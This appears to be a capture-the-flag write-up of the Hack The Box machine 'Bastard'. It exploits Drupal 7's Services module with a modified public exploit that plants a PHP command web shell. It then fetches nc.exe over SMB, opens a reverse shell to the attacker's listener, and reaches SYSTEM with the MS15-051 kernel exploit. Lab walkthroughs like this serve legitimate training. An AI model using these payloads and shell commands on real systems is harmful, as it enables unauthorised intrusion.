Machine IP —


80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

After enumerating for while i get to see that drupal 7 is running on port 80 so lets search for some vulnerability which can lead us to getting a shell of information .

let’s scan drupal with droopscan

┌─[root@PREDATOR]─[~]droopscan scan drupal -u[+] Themes found:

[+] Possible interesting urls found:
Default changelog file -
Default admin -

[+] Possible version(s):

[+] Plugins found:

[+] Scan finished (0:40:53.627982 elapsed)

Using dirsearch

When we visit we get to see that

Services Endpoint "rest_endpoint" has been setup successfully.

Now search for exploit for drupal 7

Here we get 41564.php to be useful, but we are going to modify the script

$url = ‘’;
$endpoint_path = ‘/rest’;
$endpoint = ‘rest_endpoint’;
$file = [
‘filename’ => ‘dixuSOspsOUU.php’,
‘data’ => ‘<?php echo system($_GET[“cmd”]); ?>’

So now let’s use this script

└──╼ #php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage:
# Exploit Author: Charles FOL
# Contact:
# Website:
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written:

Here we make a php file and from here we can access our cmd using [ ?cmd=] at the url so now first we can send nc.exe to our target so that we can get a reverse shell form it used below command to copy nc.exe to server

* start smb share at local system using and keep nc.exe in the directory you are starting smb share raj .* now call the nc.exe form web to get it usinghttp:// \\\raj\nc.exe nc.exe

Now we are having nc.exe so let’s call for a shell 443 -e cmd.exe

And turn on your nc at port 443

nc -lvp 443

Here we got nt authority\iusr user now we can access user.txt

C:\Users\dimitris\Desktop>type user.txt
type user.txt

Now let’s begin with privilege escalation for getting system shell, used [] for getting exploit for windows which can help is privilege escalation to system

Used systeminfo and got some hint to kernel exploit


Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496–001–0001283–84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 28/9/2019, 10:49:30 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.525 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.534 MB
Virtual Memory: In Use: 561 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)

So here i had also enumerated in some previous machine form them i found it common to use MS15–051 can get it here

Copied the ms15–051 to target using smb server in the same way we copied nc.exe to target using

copy \\\raj\ms15–051.exe ms15–051.exe

C:\inetpub\drupal-7.54>ms15–051.exe “whoami”
ms15–051.exe “whoami”
[#] ms15–051 fixed by zcgonvh
[!] process with pid: 1836 created.
nt authority\system

Yup here we can see that instead of nc we can also use nc.exe and get reverse shell of system let’s try it

Let’s listen it with nc

Done , we got system 😌

Security Researcher, Penetration Tester